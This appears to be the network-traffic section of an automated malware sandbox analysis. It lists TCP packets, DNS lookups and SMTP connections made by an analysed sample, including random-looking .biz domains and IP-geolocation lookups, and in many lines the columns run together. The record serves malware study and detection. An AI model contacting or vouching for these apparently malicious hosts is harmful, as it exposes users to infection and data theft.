Dec 10, 2024 07:05:28.984954119 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.985119104 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.985140085 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.985225916 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.991326094 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.991344929 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.991463900 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.991477966 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.991539955 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.997359037 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.997380972 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.997493982 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:28.997505903 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:28.997591972 CET  49707        443        192.168.2.9   41.185.8.252
Dec 10, 2024 07:05:29.004353046 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:29.004370928 CET  443          49707      41.185.8.252  192.168.2.9
Dec 10, 2024 07:05:29.004477024 CET  49707        443        192.168.2.9   41.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.004487991 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.004545927 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.150129080 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.150151014 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.150268078 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.150278091 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.150345087 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.156992912 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.157025099 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.157108068 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.157119989 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.157193899 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.163748980 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.163770914 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.163844109 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.163852930 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.163871050 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.167243004 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.170671940 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.170691013 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.170805931 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.170818090 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.170937061 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.176693916 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.176712036 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.176879883 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.176891088 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.176959038 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.182096004 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.182133913 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.182184935 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.182267904 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.182328939 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.277949095 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.277972937 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.277985096 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:29.277992010 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.600315094 CET4970980192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.629084110 CET4971080192.168.2.9158.101.44.242
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.719619036 CET804970954.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.719712019 CET4970980192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.720594883 CET4970980192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.720594883 CET4970980192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.748485088 CET8049710158.101.44.242192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.748563051 CET4971080192.168.2.9158.101.44.242
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.749125004 CET4971080192.168.2.9158.101.44.242
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.839926958 CET804970954.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.839940071 CET804970954.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.868360043 CET8049710158.101.44.242192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:35.985436916 CET8049710158.101.44.242192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.043401957 CET4971080192.168.2.9158.101.44.242
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.061935902 CET804970954.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.062047958 CET804970954.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.062119007 CET4970980192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.084744930 CET4970980192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.171304941 CET4971080192.168.2.9158.101.44.242
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.204078913 CET804970954.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.290616989 CET8049710158.101.44.242192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.547095060 CET8049710158.101.44.242192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.654150963 CET4971080192.168.2.9158.101.44.242
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.763911009 CET49712443192.168.2.9104.21.67.152
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.763958931 CET44349712104.21.67.152192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.764065981 CET49712443192.168.2.9104.21.67.152
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.767568111 CET49712443192.168.2.9104.21.67.152
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.767587900 CET44349712104.21.67.152192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.854470968 CET4971380192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.973881960 CET804971318.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.974069118 CET4971380192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.974234104 CET4971380192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.974292040 CET4971380192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:37.093535900 CET804971318.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:37.093558073 CET804971318.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:37.983581066 CET44349712104.21.67.152192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:37.983702898 CET49712443192.168.2.9104.21.67.152
                                                                                                                                                                                                                        Dec 10, 2024 07:05:37.990793943 CET49712443192.168.2.9104.21.67.152
                                                                                                                                                                                                                        Dec 10, 2024 07:05:37.990804911 CET44349712104.21.67.152192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:37.991168022 CET44349712104.21.67.152192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:38.046255112 CET49712443192.168.2.9104.21.67.152
                                                                                                                                                                                                                        Dec 10, 2024 07:05:38.095640898 CET49712443192.168.2.9104.21.67.152
                                                                                                                                                                                                                        Dec 10, 2024 07:05:38.139333963 CET44349712104.21.67.152192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:38.429776907 CET44349712104.21.67.152192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:38.429850101 CET44349712104.21.67.152192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:38.429924965 CET49712443192.168.2.9104.21.67.152
                                                                                                                                                                                                                        Dec 10, 2024 07:05:38.501676083 CET49712443192.168.2.9104.21.67.152
                                                                                                                                                                                                                        Dec 10, 2024 07:05:38.952589989 CET4971580192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.014857054 CET804971318.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.014908075 CET804971318.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.015017986 CET4971380192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.015136003 CET4971380192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.071923018 CET804971554.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.072062969 CET4971580192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.074668884 CET4971580192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.074693918 CET4971580192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.134397030 CET804971318.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.193989038 CET804971554.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.194005013 CET804971554.244.188.177192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.534398079 CET4971780192.168.2.954.244.188.177
                                                                                                                                                                                                                        Dec 10, 2024 07:05:50.512968063 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:50.513339043 CET49725587192.168.2.9103.20.200.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:50.632622004 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.033073902 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.033217907 CET49725587192.168.2.9103.20.200.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.152493954 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.553322077 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.554243088 CET49725587192.168.2.9103.20.200.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.554286003 CET49725587192.168.2.9103.20.200.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.554294109 CET49725587192.168.2.9103.20.200.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.554318905 CET49725587192.168.2.9103.20.200.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.673742056 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.673757076 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.673768044 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.673784971 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.307727098 CET804972772.52.179.174192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.316836119 CET804972872.52.179.174192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.330883026 CET58749725103.20.200.105192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.351552010 CET4972780192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.367185116 CET4972880192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.382766962 CET49725587192.168.2.9103.20.200.105
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.719649076 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.762592077 CET4973080192.168.2.9199.59.243.227
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.839005947 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.839137077 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.839330912 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.881875992 CET8049730199.59.243.227192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.881953955 CET4973080192.168.2.9199.59.243.227
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.882267952 CET4973080192.168.2.9199.59.243.227
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.958539009 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:53.001640081 CET8049730199.59.243.227192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:53.979266882 CET8049730199.59.243.227192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:53.979295015 CET8049730199.59.243.227192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:53.979619026 CET4973080192.168.2.9199.59.243.227
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.126724958 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127228022 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127281904 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127295971 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127294064 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127352953 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127424002 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127435923 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127461910 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127477884 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127497911 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127513885 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127651930 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127664089 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127710104 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.246736050 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.246752024 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.246829033 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.319403887 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.319508076 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.319564104 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.323637962 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.367150068 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.493613958 CET4972480192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.493673086 CET4972480192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.613606930 CET8049724172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.613625050 CET8049724172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.702667952 CET4973180192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.821957111 CET804973118.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.822046041 CET4973180192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.833575964 CET8049724172.234.222.143192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.839410067 CET4973180192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.839492083 CET4973180192.168.2.918.141.10.107
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.846071005 CET4972780192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.879702091 CET4972480192.168.2.9172.234.222.143
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.958827972 CET804973118.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.958852053 CET804973118.141.10.107192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.965569973 CET804972772.52.179.174192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.223030090 CET804972772.52.179.174192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.273410082 CET4972780192.168.2.972.52.179.174
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.457324028 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.576617002 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.960787058 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.962182045 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.962236881 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.962275028 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.970571041 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.970640898 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.970715046 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.978965044 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.979033947 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.979073048 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.987288952 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.987390995 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.987406969 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.995683908 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.995737076 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.995768070 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.004072905 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.004106045 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.004127979 CET4972980192.168.2.913.248.148.254
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.012716055 CET804972913.248.148.254192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.012811899 CET4972980192.168.2.913.248.148.254
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 10, 2024 07:05:19.959225893 CET | 49801 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:20.967344046 CET | 49801 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:21.528405905 CET | 53 | 49801 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:21.528434038 CET | 53 | 49801 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:34.394490957 CET | 57620 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:34.476562977 CET | 64064 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:34.531740904 CET | 53 | 57620 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:34.613818884 CET | 53 | 64064 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:36.332869053 CET | 50208 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:36.622766972 CET | 53809 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:36.762520075 CET | 53 | 53809 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:36.805236101 CET | 53 | 50208 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:38.763231993 CET | 58471 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:38.900460005 CET | 53 | 58471 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:39.035650969 CET | 64356 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:39.509748936 CET | 53 | 64356 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:40.504946947 CET | 64293 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:40.642160892 CET | 53 | 64293 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:41.095743895 CET | 50123 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:41.576323986 CET | 53 | 50123 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:42.900322914 CET | 58993 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:42.927993059 CET | 49551 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:43.038377047 CET | 53 | 58993 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:43.253587961 CET | 53 | 49551 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:44.514067888 CET | 57178 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:44.593676090 CET | 59968 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:44.730432034 CET | 53 | 59968 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:44.743771076 CET | 53 | 57178 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:45.895601988 CET | 64325 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:46.083996058 CET | 64135 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:46.221590996 CET | 53 | 64135 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:46.445831060 CET | 53 | 64325 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:52.314101934 CET | 50498 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:52.319698095 CET | 64045 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:52.713200092 CET | 53 | 50498 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:52.760778904 CET | 53 | 64045 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:54.011379957 CET | 50460 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:54.223753929 CET | 53 | 50460 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:54.224970102 CET | 51600 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:54.697482109 CET | 53 | 51600 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:56.092195034 CET | 61639 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:56.229682922 CET | 53 | 61639 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:56.230613947 CET | 62925 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:56.367852926 CET | 53 | 62925 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:56.884445906 CET | 62543 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:57.107588053 CET | 53 | 62543 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:57.108449936 CET | 64013 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:57.323951006 CET | 53 | 64013 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:57.324650049 CET | 51936 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:58.320677996 CET | 51936 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:58.339792013 CET | 53 | 51936 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:58.457187891 CET | 53 | 51936 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:58.645046949 CET | 59224 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:58.782947063 CET | 53 | 59224 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:58.783714056 CET | 52810 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:58.923464060 CET | 53 | 52810 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:05:58.924352884 CET | 58277 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:05:59.061625957 CET | 53 | 58277 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:06:42.456146955 CET | 63669 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:06:43.388295889 CET | 53 | 63669 | 1.1.1.1 | 192.168.2.9
Dec 10, 2024 07:06:44.169616938 CET | 63068 | 53 | 192.168.2.9 | 1.1.1.1
Dec 10, 2024 07:06:44.307065964 CET | 53 | 63068 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 10, 2024 07:05:19.959225893 CET | 192.168.2.9 | 1.1.1.1 | 0x5658 | Standard query (0) | lwaziacademy.com | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:20.967344046 CET | 192.168.2.9 | 1.1.1.1 | 0x5658 | Standard query (0) | lwaziacademy.com | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:34.394490957 CET | 192.168.2.9 | 1.1.1.1 | 0x1751 | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:34.476562977 CET | 192.168.2.9 | 1.1.1.1 | 0xcc9f | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:36.332869053 CET | 192.168.2.9 | 1.1.1.1 | 0xbe6b | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:36.622766972 CET | 192.168.2.9 | 1.1.1.1 | 0xd997 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:38.763231993 CET | 192.168.2.9 | 1.1.1.1 | 0x8e2d | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
